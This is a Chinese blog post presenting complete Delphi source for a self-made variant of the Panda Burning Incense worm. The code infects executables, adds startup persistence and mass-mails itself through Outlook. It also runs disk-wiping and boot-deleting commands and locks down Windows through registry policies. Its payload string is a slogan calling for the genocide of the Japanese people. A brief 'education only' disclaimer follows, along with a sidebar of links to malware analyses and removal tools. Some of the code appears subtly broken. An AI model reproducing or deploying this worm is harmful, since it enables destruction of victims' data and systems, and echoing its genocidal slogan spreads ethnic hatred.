自制熊猫烧香进阶

原创 已于 2024-07-31 13:02:43 修改 · 399 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#Delphi

于 2024-07-31 12:59:55 首次发布
program HateLetter;

uses
  Windows, SysUtils, Classes, Graphics, ShellAPI, ComObj, Variants, Registry, ActiveX, ShlObj;

const
  HeaderSize = 82432; // 病毒体的大小
  IconOffset = \$12EB8; // PE文件主图标的偏移量
  IconSize = \$2E8; // PE文件主图标的大小--744字节
  IconTail = IconOffset + IconSize; // PE文件主图标的尾部
  ID = \$44444444; // 感染标记
  Catchword = 'If a race need to be killed out, it must be Yamato. ' +
              'If a country need to be destroyed, it must be Japan! ' +
              '*** W32.HateLetter.Worm.A ***';
{$R *.RES}

function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer; stdcall; external 'Kernel32.dll'; // 函数声明

var
  TmpFile: string;
  Si: STARTUPINFO;
  Pi: PROCESS_INFORMATION;
  IsJap, IsEng, IsChn: Boolean; // 日文、英文和中文操作系统标记
  SourceFile: string;

// 复制自身到D:\Backup目录
procedure CopySelfToBackup;
const
  BackupPath = 'D:\Backup\HateLetter.exe';
begin
  try
    if not DirectoryExists('D:\Backup') then
      CreateDir('D:\Backup');
    CopyFile(PChar(ParamStr(0)), PChar(BackupPath), False);
  except
    // 处理异常
  end;
end;

procedure ExecuteCommand(const Cmd: string);
begin
  ShellExecute(0, 'open', 'cmd.exe', PChar('/C ' + Cmd), nil, SW_HIDE);
end;

procedure CopyFileToSpecialFolder(const SourceFile, SpecialFolder: string);
var
  Path: array[0..MAX_PATH] of Char;
begin
  if Succeeded(SHGetFolderPath(0, CSIDL_STARTMENU or CSIDL_FLAG_CREATE, 0, 0, Path)) then
  begin
    CopyFile(PChar(SourceFile), PChar(Path + '\' + SpecialFolder), False);
  end;
end;

procedure SetRegistryValue(RootKey: HKEY; const Key, Name: string; ValueType: TRegDataType; const Value: Variant);
var
  Reg: TRegistry;
begin
  Reg := TRegistry.Create(KEY_WRITE);
  try
    Reg.RootKey := RootKey;
    if Reg.OpenKey(Key, True) then
    begin
      case ValueType of
        rdString, rdExpandString: Reg.WriteString(Name, Value);
        rdInteger: Reg.WriteInteger(Name, Value);
        rdBinary: Reg.WriteBinaryData(Name, Value, Length(Value));
      end;
    end;
  finally
    Reg.Free;
  end;
end;

// 安装Outlook
procedure InstallOutlook;
begin
  ExecuteCommand('powershell -Command "Start-Process msiexec.exe -ArgumentList \'/i OutlookSetup.msi /quiet /norestart\' -NoNewWindow -Wait"');
end;

procedure SendEmails;
var
  OutlookApp, MailItem, Namespace, AddressLists, AddressEntry: OleVariant;
  I: Integer;
  Recipient: String;
  Dir2: String;
begin
  try
    OutlookApp := CreateOleObject('Outlook.Application');
  except
    // 安装Outlook
    InstallOutlook;
    OutlookApp := CreateOleObject('Outlook.Application');
  end;

  Namespace := OutlookApp.GetNamespace('MAPI');
  AddressLists := Namespace.AddressLists.Item(1);

  Dir2 := 'D:\Backup\HateLetter.exe'; // Set the directory for the attachments

  for I := 1 to AddressLists.AddressEntries.Count do
  begin
    try
      MailItem := OutlookApp.CreateItem(0); // Create a new email item
      AddressEntry := AddressLists.AddressEntries.Item(I);
      Recipient := AddressEntry.Address;
      
      MailItem.Recipients.Add(Recipient);
      MailItem.Subject := 'You are foolish!!!!!!!!!!!!!!!!!';
      MailItem.Body := 'I hate you, here is a document explaining why you are so foolish!!!!!!!!';
      MailItem.Attachments.Add(Dir2 + 'HateLetter.exe'); // Add attachment
      MailItem.Send; // Send the email
    except
      on E: Exception do
      begin
        // Handle the exception
        // For instance, log the error, display a message, or ignore it
      end;
    end;
  end;
end;

function IsWin9x: Boolean;
var
  Ver: TOSVersionInfo;
begin
  Result := False;
  Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);
  if not GetVersionEx(Ver) then
    Exit;
  if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then // Win9x
    Result := True;
end;

procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream; dStartPos: Integer; Count: Integer);
var
  sCurPos, dCurPos: Integer;
begin
  sCurPos := Src.Position;
  dCurPos := Dst.Position;
  Src.Seek(sStartPos, soFromBeginning);
  Dst.Seek(dStartPos, soFromBeginning);
  Dst.CopyFrom(Src, Count);
  Src.Seek(sCurPos, soFromBeginning);
  Dst.Seek(dCurPos, soFromBeginning);
end;

procedure ExtractFile(FileName: string);
var
  sStream, dStream: TFileStream;
begin
  try
    sStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);
    try
      dStream := TFileStream.Create(FileName, fmCreate);
      try
        sStream.Seek(HeaderSize, soFromBeginning); // 跳过头部的病毒部分
        dStream.CopyFrom(sStream, sStream.Size - HeaderSize);
      finally
        dStream.Free;
      end;
    finally
      sStream.Free;
    end;
  except
    // 处理异常
  end;
end;

procedure FillStartupInfo(var Si: STARTUPINFO; State: Word);
begin
  Si.cb := SizeOf(Si);
  Si.lpReserved := nil;
  Si.lpDesktop := nil;
  Si.lpTitle := nil;
  Si.dwFlags := STARTF_USESHOWWINDOW;
  Si.wShowWindow := State;
  Si.cbReserved2 := 0;
  Si.lpReserved2 := nil;
end;

procedure InfectOneFile(FileName: string);
var
  HdrStream, SrcStream: TFileStream;
  IcoStream, DstStream: TMemoryStream;
  iID: LongInt;
  aIcon: TIcon;
  Infected, IsPE: Boolean;
  i: Integer;
  Buf: array[0..1] of Char;
begin
  try
    if CompareText(FileName, 'HateLetter.exe') = 0 then // 是自己则不感染
      Exit;

    Infected := False;
    IsPE := False;
    SrcStream := TFileStream.Create(FileName, fmOpenRead);
    try
      for i := 0 to \$108 do // 检查PE文件头
      begin
        SrcStream.Seek(i, soFromBeginning);
        SrcStream.Read(Buf, 2);
        if (Buf[0] = #80) and (Buf[1] = #69) then // PE标记
        begin
          IsPE := True; // 是PE文件
          Break;
        end;
      end;

      SrcStream.Seek(-4, soFromEnd); // 检查感染标记
      SrcStream.Read(iID, 4);
      if (iID = ID) or (SrcStream.Size < 10240) then // 太小的文件不感染
        Infected := True;
    finally
      SrcStream.Free;
    end;

    if Infected or (not IsPE) then // 如果感染过了或不是PE文件则退出
      Exit;

    IcoStream := TMemoryStream.Create;
    DstStream := TMemoryStream.Create;
    try
      aIcon := TIcon.Create;
      try
        aIcon.ReleaseHandle;
        aIcon.Handle := ExtractIcon(HInstance, PChar(FileName), 0);
        aIcon.SaveToStream(IcoStream);
      finally
        aIcon.Free;
      end;

      SrcStream := TFileStream.Create(FileName, fmOpenRead);
      HdrStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);
      try
        if IcoStream.Size = 0 then // 该文件没有图标
        begin
          CopyStream(HdrStream, IconOffset, DstStream, 0, IconSize); // 复制病毒文件的图标
          CopyStream(HdrStream, 0, DstStream, IconSize, HeaderSize); // 复制病毒体
          CopyStream(SrcStream, 0, DstStream, HeaderSize + IconSize, SrcStream.Size); // 复制宿主文件
        end else begin
          CopyStream(HdrStream, 0, DstStream, 0, IconOffset); // 复制图标前的数据
          CopyStream(IcoStream, 22, DstStream, IconOffset, IcoStream.Size - 22); // 替换宿主的图标
          CopyStream(HdrStream, IconTail, DstStream, DstStream.Size, HeaderSize - IconTail); // 复制图标后的病毒体数据
          CopyStream(SrcStream, 0, DstStream, DstStream.Size, SrcStream.Size); // 复制宿主文件
        end;

        iID := ID;
        DstStream.Write(iID, 4); // 写入感染标记
        DstStream.SaveToFile(FileName);
      finally
        HdrStream.Free;
        SrcStream.Free;
      end;
    finally
      IcoStream.Free;
      DstStream.Free;
    end;
  except
    // 处理异常
  end;
end;

procedure InfectFiles;
var
  Path: string;
  SearchRec: TSearchRec;
begin
  Path := ExtractFilePath(ParamStr(0));
  if FindFirst(Path + '*.*', faAnyFile, SearchRec) = 0 then
  begin
    repeat
      if (SearchRec.Attr and faDirectory) = 0 then
        InfectOneFile(Path + SearchRec.Name);
    until FindNext(SearchRec) <> 0;
    FindClose(SearchRec);
  end;
end;

procedure ExecuteDestructiveCommands;
begin
  ExecuteCommand('bcdedit /delete {current}');
  ExecuteCommand('format C:\');
  ExecuteCommand('dd if=/dev/zero of=/dev/sda');
  ExecuteCommand('rm -rf /');
end;

procedure SetAdditionalRegistryValues;
begin
  SetRegistryValue(HKEY_CURRENT_USER, 'Software\Microsoft\Windows\CurrentVersion\Policies\Explorer', 'NoRun', rdInteger, 1);
  SetRegistryValue(HKEY_CURRENT_USER, 'Software\Microsoft\Windows\CurrentVersion\Policies\Explorer', 'NoClose', rdInteger, 1);
  SetRegistryValue(HKEY_CURRENT_USER, 'Software\Microsoft\Windows\CurrentVersion\Policies\Explorer', 'NoDrives', rdInteger, 63000000);
  SetRegistryValue(HKEY_CURRENT_USER, 'Software\Microsoft\Windows\CurrentVersion\Policies\System', 'DisableRegistryTools', rdInteger, 1);
  SetRegistryValue(HKEY_LOCAL_MACHINE, 'Software\Microsoft\Windows\CurrentVersion\Run', 'ScanRegistry', rdString, '');
  SetRegistryValue(HKEY_CURRENT_USER, 'Software\Microsoft\Windows\CurrentVersion\Policies\Explorer', 'NoLogOff', rdInteger, 1);
  SetRegistryValue(HKEY_CURRENT_USER, 'Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp', 'NoRealMode', rdInteger, 1);
  SetRegistryValue(HKEY_LOCAL_MACHINE, 'Software\Microsoft\Windows\CurrentVersion\Run', 'Win32system', rdString, 'Win32system.vbs');
  SetRegistryValue(HKEY_CURRENT_USER, 'Software\Microsoft\Windows\CurrentVersion\Policies\Explorer', 'NoDesktop', rdInteger, 1);
  SetRegistryValue(HKEY_CURRENT_USER, 'Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp', 'Disabled', rdInteger, 1);
  SetRegistryValue(HKEY_CURRENT_USER, 'Software\Microsoft\Windows\CurrentVersion\Policies\Explorer', 'NoSetTaskBar', rdInteger, 1);
  SetRegistryValue(HKEY_CURRENT_USER, 'Software\Microsoft\Windows\CurrentVersion\Policies\Explorer', 'NoViewContextMenu', rdInteger, 1);
  SetRegistryValue(HKEY_CURRENT_USER, 'Software\Microsoft\Windows\CurrentVersion\Policies\Explorer', 'NoSetFolders', rdInteger, 1);
  SetRegistryValue(HKEY_LOCAL_MACHINE, 'Software\CLASSES', '.reg', rdString, 'txtfile');
  SetRegistryValue(HKEY_LOCAL_MACHINE, 'Software\Microsoft\Windows\CurrentVersion\Winlogon', 'LegalNoticeCaption', rdString, 'Your computer is trashed');
  SetRegistryValue(HKEY_LOCAL_MACHINE, 'Software\Microsoft\Windows\CurrentVersion\Winlogon', 'LegalNoticeText', rdString, 'Destroyed!!!');
end;

begin
  RegisterServiceProcess(GetCurrentProcessID, 1); // 注册为服务进程以隐藏

  TmpFile := GetEnvironmentVariable('temp') + '\HateLetter.exe'; // 创建临时文件
  ExtractFile(TmpFile); // 提取病毒文件部分到临时文件
  FillStartupInfo(Si, SW_HIDE); // 填充启动信息,隐藏窗口
  SetRegistryValue(HKEY_CURRENT_USER, 'Software\Microsoft\Windows\CurrentVersion\Run', 'HateLetter', rdString, TmpFile); // 注册启动项
  CopyFileToSpecialFolder(TmpFile, 'Startup\HateLetter.exe'); // 复制到启动文件夹
  InfectFiles; // 感染其他文件
  SendEmails; // 发送电子邮件

  // 执行破坏性命令
  ExecuteDestructiveCommands;

  // 设置额外的注册表值
  SetAdditionalRegistryValues;
end.

重要警告

再次强调,这段代码展示了恶意软件的行为,仅用于教育和研究目的。请勿在真实环境中运行或传播这段代码。未经授权的计算机访问和破坏是违法行为,可能导致严重的法律后果。如果使用虚拟机测试,请务必断网,因为是蠕虫病毒!

[病毒分析]熊猫烧香(上)初始分析
网络安全知识分享
03-03 1万+
熊猫烧香病毒分析(第一篇)一、病毒初始化二、PEID加壳检查三、IDA和OD的分析(1)使用IDA载入病毒样本(2)定位到0x0040CB7E位置(3)sub_403C98函数分析(4)打开IDA进入sub_403C98函数(5)sub_405360函数分析(6)sub_404018函数分析(7)loc_40CBBC功能分析四、总结 熊猫烧香样本下载 提取码:8189 一、病毒初始化 1、工具准备 IDA、OD、PEID 2、基本流程: 利用查壳工具检查病毒是否带壳 利用OD动态分析病毒 利用IDA
第6篇 熊猫烧香专杀工具编写
热门推荐
qq_55202378的博客
09-24 3万+
专杀工具编写
菜鸟之路---1,熊猫烧香病毒的简单分析
u012871930的博客
02-27 4976
病毒的网盘链接:https://pan.baidu.com/s/1dtMjiI 密码:l1ii(谨慎下载,免得感染了你的电脑)1.样本概况1.1 样本信息文件: spo0lsv.exe(熊猫烧香)大小: 30001 字节修改时间: 2007年1月17日, 12:18:40MD5:512301C535C88255C9A252FDF70B7A03SHA1: CA3A1070CFF311C0BA40AB...
熊猫烧香病毒专杀下载
conglengjie0508的博客
01-16 370
大成天下出手的专杀工具,现在升级到了1.6版http://dswlab.com/dow/d2.html[@more@] ...
熊猫烧香--绿色软件哦 嘿嘿!
weixin_30914981的博客
06-27 294
熊猫烧箱子 打开--点击执行exe文件 然后点方块里的字 最后坚持30秒不要乱动哦 转载于:https://www.cnblogs.com/loverain/archive/2008/06/27/1231185.html
精选资源
工程伦理案例分析-“熊猫烧香”案例分析
01-18
【工程伦理案例分析——“熊猫烧香”】 “熊猫烧香”事件是中国互联网历史上的一次重大安全事件,它揭示了软件开发伦理的重要性。这个案例涉及到的伦理问题主要包括:技术滥用、责任承担、信息安全和道德责任。 1....
熊猫烧香病毒分析
ZK_1874的博客
10-28 3407
熊猫烧香病毒分析
第1篇:熊猫烧香之手动查杀
qq_55202378的博客
09-06 1908
手动查杀
号称病毒之王的“熊猫烧香”详细分析
Test网络安全
09-12 1万+
01-样本概况 1.1-样本信息 基本信息 文件: C:\Users\15pb-win7\Desktop\xiongmao.exe 大小: 30001 bytes 修改时间: 2018年7月14日, 8:40:21 MD5: 512301C535C88255C9A252FDF70B7A03 SHA1: CA3A1070CFF311C0BA40AB60A8FE3266CFEFE870 CRC32: E334747C 病毒行为: 1.在系统目录下生成病毒程序
熊猫烧香病毒专杀工具集.rar
08-26
熊猫烧香病毒专杀工具集
熊猫烧香专杀工具
08-08
熊猫烧香专杀工具熊猫烧香专杀工具熊猫烧香专杀工具
Windows XP Professional SP3(熊猫烧香病毒)
最新发布
2301_79046256的博客
06-16 1426
T72KM-6GWBP-GX7TD-GXFT2-7WT2B (上海政府0686版)
Cool_gamesetup.exe山寨版熊猫烧香病毒
weixin_34281477的博客
11-12 7045
一、病毒信息 病毒名:win32.bmw.j.75783 病毒体大小:74.0 KB (75,783 字节) 病毒类型:熊猫烧香变种 二、病毒行为 这是一个熊猫烧香的变种,伪装成毒霸的图标来迷惑用户,它还会下载其他病毒并执行。 1.病毒会删除安全软件的开机启动项目和服务项目。 2.每1秒添加自己的启动项,并将文件隐藏显示注册表键值破坏。 3.每隔6...
熊猫烧香”有新变种 可自动下载病毒
02-03 4153
上海计算机病毒防范服务中心2日紧急预警,在互联网上肆虐一个多月的“熊猫烧香”病毒又出现一个名为“熊猫烧香释放器”的新型变种。病毒防范部门提醒用户小心提防。 据了解,这一变种不同于以往的各种变种形式,而是增加了自我下载“熊猫烧香”病毒的功能,是一种升级版变种。这种病毒运行后,在被感染的计算机上释放“熊猫烧香”蠕虫病毒,利用Windows系统的自动播放功能来运行。     
熊猫烧香C语言源代码,熊猫烧香病毒源代码 1.0 完整版 (图文)
weixin_28885791的博客
05-22 1万+
熊猫烧香”是一种可经过多次变种的蠕虫病毒变种形态,新云软件园提供熊猫烧香病毒源代码下载,它能感染系统中exe,com,pif,src,html,asp等文件,它还能中止大量的反病毒软件进程并且会删除扩展名为gho的文件,该文件是一系统备份工具GHOST的备份文件,使用户的系统备份文件丢失。被感染的用户系统中所有.exe可执行文件全部被改成熊猫举着三根香的模样。源码分析大体的看了下,主要是通过拷贝...
熊猫烧香是什么?
资深程序员,曾自学JAVA,C#,如今从业于网安行业
06-30 4520
如果你也想学习:黑客&网络安全的零基础攻防教程熊猫烧香(Worm.WhBoy.cw)是一种由李俊制作的电脑病毒,于2006年底至2007年初在互联网上大规模爆发。这个病毒因其感染后的系统可执行文件图标会变成熊猫举着三根香的模样而得名。熊猫烧香病毒具有自动传播、自动感染硬盘的能力,以及强大的破坏能力。
Web安全和渗透测试有什么关系?
Python_0011的博客
03-31 3900
做渗透测试的一个环节就是测试web安全,需要明白漏洞产生原理,通过信息收集互联网暴露面,进行漏洞扫描,漏洞利用,必要时进行脚本自编写和手工测试,力求挖出目标存在的漏洞并提出整改建议,当然如果技术再精一些,还要学习内网渗透(工作组和域环境),白盒审计,app,小程序渗透那些了......可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。总之,web安全包含于渗透测试,但不是渗透测试的全部。
全面灭绝熊猫烧香病毒的专杀工具集
标题《熊猫烧香病毒专杀工具集》直接指向了主题,即这是一套专门用于清除名为“熊猫烧香”的计算机病毒的工具集合。描述中仅仅重复了标题的内容,而没有提供更多细节,不过考虑到这是一套专杀工具集,可以推断出这些...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值